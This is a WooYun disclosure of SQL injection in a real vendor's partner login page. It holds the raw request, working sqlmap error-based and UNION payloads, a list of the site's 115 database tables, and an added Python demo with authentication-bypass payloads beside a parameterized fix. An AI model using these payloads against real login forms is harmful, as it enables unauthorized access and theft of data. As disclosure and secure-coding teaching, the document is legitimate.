
Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0168739

Title: SQL injection vulnerability on a 道有道 (Daoyoudao) site

Affected vendor: daoyoudao.com

Author: 路人甲 (anonymous)

Submitted: 2016-01-11 11:43

Fix time: 2016-01-16 11:44

Made public: 2016-01-16 11:44

Vulnerability type: SQL injection

Severity: high

Self-assessed rank: 15

Status: vendor notified, vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:

Bookmarks: 4


Vulnerability details

Disclosure status:

2016-01-11: details sent to the vendor, awaiting vendor response
2016-01-16: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

POST /lg_login.do HTTP/1.1
Content-Length: 153
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://partner.daoyoudao.com
Cookie: JSESSIONID=E529A57F68C85A32A8EC17315605BEED
Host: partner.daoyoudao.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
userName=1&userPass=

(screenshot 1.png, not included)

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userName (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: userName=1' AND (SELECT 9788 FROM(SELECT COUNT(*),CONCAT(0x716a707171,(SELECT (ELT(9788=9788,1))),0x716b767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'FElK'='FElK&userPass=
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: userName=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707171,0x47585452437361727774,0x716b767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &userPass=
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0
Database: channel
[115 tables]
+------------------------------------+
| BusinessName |
| E_partner_organization |
| MD_office_plan |
| Menu |
| MenuOlder |
| Menu_20130722 |
| Micputer |
| OtherOrderDetail |
| Role |
| RoleToMenu |
| RoleToMicputer |
| TMP_invoice_init |
| UserToRole |
| Verify |
| User |
| accountingStatement |
| accountingStatic |
| accountingStatic_20150206_tiger |
| accountingStatic_copy |
| ad_area |
| ad_city |
| ad_province |
| advice |
| analysisAccount |
| angentSale |
| angentSale_copy |
| appChangeLog |
| appcenter |
| appendOrder |
| backOrder |
| c3p0testtable |
| cancelOrder |
| cancelToPay |
| channelBaseInfo |
| channelBillDetail |
| channelInfo |
| clientInfo |
| courseReservation |
| course_info_for_partner |
| deduction |
| dic_base_info |
| docnottype |
| document_notice |
| document_notice_1107 |
| document_notice_detail |
| document_notice_detail_1107 |
| downloadAddressLog |
| engineer |
| fundsFlowManagement |
| fundsFlowManagement_20150206_tiger |
| fundsFlowManagement_copy_20150205 |
| goodsInformation |
| goodsPromotionInformation |
| ilive_conf |
| ilive_product |
| invoiceInfo |
| invoiceRecord |
| iosAccount |
| lecturerAccounts |
| lecturerAppointment |
| lecturerAppointment_copy |
| lecturerAppointment_copy1 |
| lecturerInformation |
| lecturerResource |
| log_cid10 |
| maildetail |
| meetingPlaces |
| monthBill |
| monthBillDetail |
| orderClass |
| orderDetail |
| orderDetail_20150206_tiger |
| orderMessage |
| orderRecord |
| orderStatusManagement |
| orderStatusManagement_android |
| orderdetail_ad |
| orderdetail_ilve |
| orderdetail_sp_split |
| otherBusinessRebates |
| p_Belong |
| p_Belong_copy |
| p_workOrder |
| partnerPrice |
| partnerSystemPackage |
| payInfo |
| payMent |
| payMent_0822 |
| payMent_20140725 |
| planSale |
| production |
| publish_manage |
| quarterDetails |
| quarterPlan |
| returnMent |
| rewardMoney |
| scheduleMaintenance |
| settingLecturerAccounts |
| specialconf |
| specialconf_140805 |
| sys_city |
| sys_city_0814 |
| sys_product |
| sys_product_case |
| sys_sellorg |
| sys_user |
| sys_user_1009 |
| tenantInfo |
| tenantInfo_141110 |
| trainDemand |
| trainingAffiliated |
| trainingApplication |
| trainingBack |
| userToNotice |
| user_menu |
+------------------------------------+
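The two sqlmap payloads above work because lg_login.do evidently splices userName straight into its SQL. The following is an added example, not code from the original report or from the vendor's application: a login check built by string concatenation next to the parameterized form that neutralizes the same input, plus a replay of the column-count search that produced the "17 columns" UNION finding. The real backend is MySQL behind JSP; this demo uses Python's sqlite3 so it runs offline, which means the MySQL-only error-based trick (the FLOOR(RAND(0)*2) duplicate-key error) is not reproduced, while the UNION probe and the authentication bypass are. The `User` table layout, its rows and the credentials are constructed for the demo; the dump above only shows that a table named User exists.

```python
"""Added example: the lg_login.do injection pattern, vulnerable and fixed.

Constructed demo using sqlite3 in place of the target's MySQL backend.
"""
import sqlite3
from typing import Optional, Tuple

Row = Optional[Tuple]


def make_db() -> sqlite3.Connection:
    """Build a constructed `User` table; columns and rows are invented for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE User (id INTEGER, userName TEXT, userPass TEXT, role TEXT)")
    # Plaintext passwords only to keep the demo short; real code must store hashes.
    conn.executemany(
        "INSERT INTO User VALUES (?, ?, ?, ?)",
        [(1, "admin", "s3cret-admin", "admin"), (2, "partner01", "hunter2", "partner")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, user_name: str, user_pass: str) -> Row:
    """Query assembled by string concatenation: the bug sqlmap found in userName."""
    sql = (
        "SELECT id, userName, role FROM User WHERE userName = '"
        + user_name + "' AND userPass = '" + user_pass + "'"
    )
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, user_name: str, user_pass: str) -> Row:
    """Same lookup with bound parameters: input stays data, never SQL syntax."""
    sql = "SELECT id, userName, role FROM User WHERE userName = ? AND userPass = ?"
    return conn.execute(sql, (user_name, user_pass)).fetchone()


def probe_union_columns(conn: sqlite3.Connection, max_cols: int = 30) -> int:
    """Replay sqlmap's column-count search: grow the NULL list until UNION stops erroring.

    Against the real target this settled at 17; the demo query selects 3 columns.
    """
    for n in range(1, max_cols + 1):
        payload = "1' UNION ALL SELECT " + ",".join(["NULL"] * n) + "-- "
        try:
            login_vulnerable(conn, payload, "")
            return n
        except sqlite3.OperationalError:  # column count mismatch across the UNION
            continue
    raise RuntimeError("no matching column count up to %d" % max_cols)


# Payloads shaped like the report's: comment out the password check, or UNION in a forged row.
COMMENT_BYPASS = "admin'-- "
UNION_FORGED_ROW = "1' UNION ALL SELECT 99, 'forged', 'admin'-- "


def demo() -> dict:
    """Run every payload against both implementations and return the rows each yields."""
    conn = make_db()
    return {
        "vuln_comment_bypass": login_vulnerable(conn, COMMENT_BYPASS, "wrong-password"),
        "vuln_union_row": login_vulnerable(conn, UNION_FORGED_ROW, ""),
        "vuln_union_columns": probe_union_columns(conn),
        "safe_comment_bypass": login_safe(conn, COMMENT_BYPASS, "wrong-password"),
        "safe_union_row": login_safe(conn, UNION_FORGED_ROW, ""),
        "safe_legit_login": login_safe(conn, "admin", "s3cret-admin"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable function logs in as admin with a wrong password and returns an attacker-chosen row from the UNION payload; the parameterized function returns no row for either payload while still authenticating the real credentials. In a JSP application the equivalent fix is a JDBC PreparedStatement with `?` placeholders, or the bound-parameter facility of whatever ORM the code base uses.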

Proof of vulnerability:

Fix recommendation:

Copyright notice: when reposting, please credit 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored on: 2016-01-16 11:44

Vendor reply:

Vulnerability rank: 4 (WooYun rating)

Latest status:

None